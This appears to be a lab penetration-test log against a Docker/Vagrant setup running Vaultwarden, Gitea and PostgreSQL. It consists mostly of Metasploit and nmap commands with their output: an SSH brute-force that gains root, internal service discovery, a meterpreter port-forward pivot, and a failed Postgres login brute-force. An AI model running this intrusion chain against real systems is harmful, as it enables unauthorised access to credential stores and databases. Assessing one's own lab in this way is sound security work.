# base

assumed ssh access:
```sh
msfconsole
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.10
msf6 auxiliary(scanner/ssh/ssh_login) > set rport 2222
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
msf6 auxiliary(scanner/ssh/ssh_login) > set password root
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
[*] 192.168.56.10:2222 - Starting bruteforce
[+] 192.168.56.10:2222 - Success: 'root:root' 'uid=0(root) gid=0(root) groups=0(root) Linux 0e6d64e04e9d 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.56.28:34687 -> 192.168.56.10:2222) at 2025-05-12 13:47:23 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
```

access shell
```sh
msf6 > sessions -i 1
apt install dnsutils
```

assuming services are known, docker service names can be guessed
```
dig gitea

; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> gitea
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35068
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;gitea.                         IN      A

;; ANSWER SECTION:
gitea.                  600     IN      A       172.18.0.4

;; Query time: 0 msec
;; SERVER: 127.0.0.11#53(127.0.0.11) (UDP)
;; WHEN: Mon May 12 18:14:57 UTC 2025
;; MSG SIZE  rcvd: 44
```
```
dig bitwarden

; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> bitwarden
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 12038
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;bitwarden.                     IN      A

;; Query time: 0 msec
;; SERVER: 127.0.0.11#53(127.0.0.11) (UDP)
;; WHEN: Mon May 12 18:15:05 UTC 2025
;; MSG SIZE  rcvd: 27
```
```
dig vaultwarden

; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> vaultwarden
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21853
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vaultwarden.                   IN      A

;; ANSWER SECTION:
vaultwarden.            600     IN      A       172.18.0.2

;; Query time: 0 msec
;; SERVER: 127.0.0.11#53(127.0.0.11) (UDP)
;; WHEN: Mon May 12 18:27:21 UTC 2025
;; MSG SIZE  rcvd: 56
```

internal IP, would circumvent firewall outside service containers
docker default subnets are 0.0.0.0/16, assuming 172.18.0.0/16

```
nmap -sS 172.18.0.0/16
Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-12 18:33 UTC
Nmap scan report for sandbox (172.18.0.1)
Host is up (0.000011s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
2222/tcp open  EtherNetIP-1
MAC Address: 6A:DF:AC:BC:46:C7 (Unknown)

Nmap scan report for vaultwarden.vagrant_internal (172.18.0.2)
Host is up (0.000012s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 52:F1:5A:53:4C:D0 (Unknown)

Nmap scan report for vaultwarden-db.vagrant_internal (172.18.0.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
5432/tcp open  postgresql
MAC Address: BA:40:F3:B6:75:F4 (Unknown)

Nmap scan report for gitea.vagrant_internal (172.18.0.4)
Host is up (0.000010s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: C2:B1:A8:B0:84:4B (Unknown)

Nmap scan report for gitea-db.vagrant_internal (172.18.0.5)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
5432/tcp open  postgresql
MAC Address: C6:59:C3:0C:1D:1D (Unknown)

Nmap scan report for nginx.vagrant_internal (172.18.0.6)
Host is up (0.0000080s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
MAC Address: 9A:7F:8F:2C:1A:0C (Unknown)
```

This scan reveals an open port 5432, which is commonly used for PostgreSQL, and an open port 22 on the gateway.

meterpreter:
```
sessions -i 2

meterpreter > sysinfo
Computer     : 172.18.0.7
OS           : Ubuntu 22.04 (Linux 5.15.0-136-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.3
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.3:543
```

```
msf6 > use auxiliary/scanner/postgres/postgres_version 
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version Unknown (Pre-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/postgres/postgres_version) > use auxiliary/scanner/postgres/postgres_login 
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:5432 - LOGIN FAILED: :@template1 (Incorrect: FATAL        VFATAL  C28000  Mno PostgreSQL user name specified in startup packet    Fbackend_startup.c      L800    RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: FATAL   VFATAL  C28000  Mno PostgreSQL user name specified in startup packet    Fbackend_startup.c      L800    RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: FATAL        VFATAL  C28000  Mno PostgreSQL user name specified in startup packet    Fbackend_startup.c      L800    RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :password@template1 (Incorrect: FATAL        VFATAL  C28000  Mno PostgreSQL user name specified in startup packet    Fbackend_startup.c      L800    RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :admin@template1 (Incorrect: FATAL   VFATAL  C28000  Mno PostgreSQL user name specified in startup packet    Fbackend_startup.c      L800    RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: FATAL        VFATAL  C28P01  Mpassword authentication failed for user "postgres"     Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: EOFError)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: FATAL        VFATAL  C28P01  Mpassword authentication failed for user "postgres"     Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:password@template1 (Incorrect: EOFError)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:admin@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "postgres"     Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:@template1 (Incorrect: EOFError)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: FATAL      VFATAL  C28P01  Mpassword authentication failed for user "scott"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "scott"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "scott"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: FATAL      VFATAL  C28P01  Mpassword authentication failed for user "scott"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: FATAL      VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL      VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: FATAL        VFATAL  C28P01  Mpassword authentication failed for user "postgres"     Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:password@template1 (Incorrect: EOFError)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:admin@template1 (Incorrect: FATAL   VFATAL  C28P01  Mpassword authentication failed for user "postgres"     Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL      VFATAL  C28P01  Mpassword authentication failed for user "admin"        Fauth.c L321    Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: EOFError)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 0 credentials were successful.
[*] You can open a Postgres session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
```

conclusion: it secure, thank you very much, instlal your updates guys